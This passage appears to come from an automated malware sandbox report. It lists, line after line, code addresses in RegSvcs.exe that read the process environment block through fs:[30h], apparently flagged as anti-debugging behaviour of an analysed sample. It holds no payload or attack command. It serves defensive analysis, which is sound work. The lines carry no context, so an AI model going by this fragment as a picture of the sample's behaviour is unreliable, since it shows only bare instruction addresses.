                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0155E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E1D0 mov eax, dword ptr fs:[00000030h]9_2_0155E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E1D0 mov eax, dword ptr fs:[00000030h]9_2_0155E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A61C3 mov eax, dword ptr fs:[00000030h]9_2_015A61C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A61C3 mov eax, dword ptr fs:[00000030h]9_2_015A61C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015101F8 mov eax, dword ptr fs:[00000030h]9_2_015101F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B61E5 mov eax, dword ptr fs:[00000030h]9_2_015B61E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156019F mov eax, dword ptr fs:[00000030h]9_2_0156019F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156019F mov eax, dword ptr fs:[00000030h]9_2_0156019F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156019F mov eax, dword ptr fs:[00000030h]9_2_0156019F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156019F mov eax, dword ptr fs:[00000030h]9_2_0156019F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159C188 mov eax, dword ptr fs:[00000030h]9_2_0159C188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159C188 mov eax, dword ptr fs:[00000030h]9_2_0159C188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01520185 mov eax, dword ptr fs:[00000030h]9_2_01520185
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01584180 mov eax, dword ptr fs:[00000030h]9_2_01584180
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01584180 mov eax, dword ptr fs:[00000030h]9_2_01584180
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA197 mov eax, dword ptr fs:[00000030h]9_2_014DA197
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA197 mov eax, dword ptr fs:[00000030h]9_2_014DA197
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA197 mov eax, dword ptr fs:[00000030h]9_2_014DA197
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566050 mov eax, dword ptr fs:[00000030h]9_2_01566050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E2050 mov eax, dword ptr fs:[00000030h]9_2_014E2050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150C073 mov eax, dword ptr fs:[00000030h]9_2_0150C073
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01564000 mov ecx, dword ptr fs:[00000030h]9_2_01564000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01582000 mov eax, dword ptr fs:[00000030h]9_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01582000 mov eax, dword ptr fs:[00000030h]9_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01582000 mov eax, dword ptr fs:[00000030h]9_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01582000 mov eax, dword ptr fs:[00000030h]9_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01582000 mov eax, dword ptr fs:[00000030h]9_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01582000 mov eax, dword ptr fs:[00000030h]9_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01582000 mov eax, dword ptr fs:[00000030h]9_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01582000 mov eax, dword ptr fs:[00000030h]9_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE016 mov eax, dword ptr fs:[00000030h]9_2_014FE016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE016 mov eax, dword ptr fs:[00000030h]9_2_014FE016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE016 mov eax, dword ptr fs:[00000030h]9_2_014FE016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE016 mov eax, dword ptr fs:[00000030h]9_2_014FE016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01576030 mov eax, dword ptr fs:[00000030h]9_2_01576030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA020 mov eax, dword ptr fs:[00000030h]9_2_014DA020
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC020 mov eax, dword ptr fs:[00000030h]9_2_014DC020
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015620DE mov eax, dword ptr fs:[00000030h]9_2_015620DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015220F0 mov ecx, dword ptr fs:[00000030h]9_2_015220F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E80E9 mov eax, dword ptr fs:[00000030h]9_2_014E80E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA0E3 mov ecx, dword ptr fs:[00000030h]9_2_014DA0E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015660E0 mov eax, dword ptr fs:[00000030h]9_2_015660E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC0F0 mov eax, dword ptr fs:[00000030h]9_2_014DC0F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E208A mov eax, dword ptr fs:[00000030h]9_2_014E208A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A60B8 mov eax, dword ptr fs:[00000030h]9_2_015A60B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A60B8 mov ecx, dword ptr fs:[00000030h]9_2_015A60B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015780A8 mov eax, dword ptr fs:[00000030h]9_2_015780A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AA352 mov eax, dword ptr fs:[00000030h]9_2_015AA352
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01588350 mov ecx, dword ptr fs:[00000030h]9_2_01588350
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156035C mov eax, dword ptr fs:[00000030h]9_2_0156035C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156035C mov eax, dword ptr fs:[00000030h]9_2_0156035C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156035C mov eax, dword ptr fs:[00000030h]9_2_0156035C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156035C mov ecx, dword ptr fs:[00000030h]9_2_0156035C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156035C mov eax, dword ptr fs:[00000030h]9_2_0156035C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156035C mov eax, dword ptr fs:[00000030h]9_2_0156035C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158437C mov eax, dword ptr fs:[00000030h]9_2_0158437C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01500310 mov ecx, dword ptr fs:[00000030h]9_2_01500310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A30B mov eax, dword ptr fs:[00000030h]9_2_0151A30B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A30B mov eax, dword ptr fs:[00000030h]9_2_0151A30B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A30B mov eax, dword ptr fs:[00000030h]9_2_0151A30B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC310 mov ecx, dword ptr fs:[00000030h]9_2_014DC310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E3DB mov eax, dword ptr fs:[00000030h]9_2_0158E3DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E3DB mov eax, dword ptr fs:[00000030h]9_2_0158E3DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E3DB mov ecx, dword ptr fs:[00000030h]9_2_0158E3DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E3DB mov eax, dword ptr fs:[00000030h]9_2_0158E3DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015843D4 mov eax, dword ptr fs:[00000030h]9_2_015843D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015843D4 mov eax, dword ptr fs:[00000030h]9_2_015843D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA3C0 mov eax, dword ptr fs:[00000030h]9_2_014EA3C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA3C0 mov eax, dword ptr fs:[00000030h]9_2_014EA3C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA3C0 mov eax, dword ptr fs:[00000030h]9_2_014EA3C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA3C0 mov eax, dword ptr fs:[00000030h]9_2_014EA3C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA3C0 mov eax, dword ptr fs:[00000030h]9_2_014EA3C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA3C0 mov eax, dword ptr fs:[00000030h]9_2_014EA3C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E83C0 mov eax, dword ptr fs:[00000030h]9_2_014E83C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E83C0 mov eax, dword ptr fs:[00000030h]9_2_014E83C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E83C0 mov eax, dword ptr fs:[00000030h]9_2_014E83C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E83C0 mov eax, dword ptr fs:[00000030h]9_2_014E83C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159C3CD mov eax, dword ptr fs:[00000030h]9_2_0159C3CD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015663C0 mov eax, dword ptr fs:[00000030h]9_2_015663C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015163FF mov eax, dword ptr fs:[00000030h]9_2_015163FF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE3F0 mov eax, dword ptr fs:[00000030h]9_2_014FE3F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE3F0 mov eax, dword ptr fs:[00000030h]9_2_014FE3F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE3F0 mov eax, dword ptr fs:[00000030h]9_2_014FE3F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE388 mov eax, dword ptr fs:[00000030h]9_2_014DE388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE388 mov eax, dword ptr fs:[00000030h]9_2_014DE388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE388 mov eax, dword ptr fs:[00000030h]9_2_014DE388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D8397 mov eax, dword ptr fs:[00000030h]9_2_014D8397
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D8397 mov eax, dword ptr fs:[00000030h]9_2_014D8397
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D8397 mov eax, dword ptr fs:[00000030h]9_2_014D8397
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150438F mov eax, dword ptr fs:[00000030h]9_2_0150438F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150438F mov eax, dword ptr fs:[00000030h]9_2_0150438F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159A250 mov eax, dword ptr fs:[00000030h]9_2_0159A250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159A250 mov eax, dword ptr fs:[00000030h]9_2_0159A250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01568243 mov eax, dword ptr fs:[00000030h]9_2_01568243
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01568243 mov ecx, dword ptr fs:[00000030h]9_2_01568243
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6259 mov eax, dword ptr fs:[00000030h]9_2_014E6259
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA250 mov eax, dword ptr fs:[00000030h]9_2_014DA250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D826B mov eax, dword ptr fs:[00000030h]9_2_014D826B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4260 mov eax, dword ptr fs:[00000030h]9_2_014E4260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4260 mov eax, dword ptr fs:[00000030h]9_2_014E4260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4260 mov eax, dword ptr fs:[00000030h]9_2_014E4260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D823B mov eax, dword ptr fs:[00000030h]9_2_014D823B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02E1 mov eax, dword ptr fs:[00000030h]9_2_014F02E1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02E1 mov eax, dword ptr fs:[00000030h]9_2_014F02E1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02E1 mov eax, dword ptr fs:[00000030h]9_2_014F02E1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01560283 mov eax, dword ptr fs:[00000030h]9_2_01560283
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01560283 mov eax, dword ptr fs:[00000030h]9_2_01560283
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01560283 mov eax, dword ptr fs:[00000030h]9_2_01560283
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E284 mov eax, dword ptr fs:[00000030h]9_2_0151E284
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E284 mov eax, dword ptr fs:[00000030h]9_2_0151E284
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02A0 mov eax, dword ptr fs:[00000030h]9_2_014F02A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02A0 mov eax, dword ptr fs:[00000030h]9_2_014F02A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov ecx, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8550 mov eax, dword ptr fs:[00000030h]9_2_014E8550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8550 mov eax, dword ptr fs:[00000030h]9_2_014E8550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151656A mov eax, dword ptr fs:[00000030h]9_2_0151656A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151656A mov eax, dword ptr fs:[00000030h]9_2_0151656A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151656A mov eax, dword ptr fs:[00000030h]9_2_0151656A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01576500 mov eax, dword ptr fs:[00000030h]9_2_01576500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
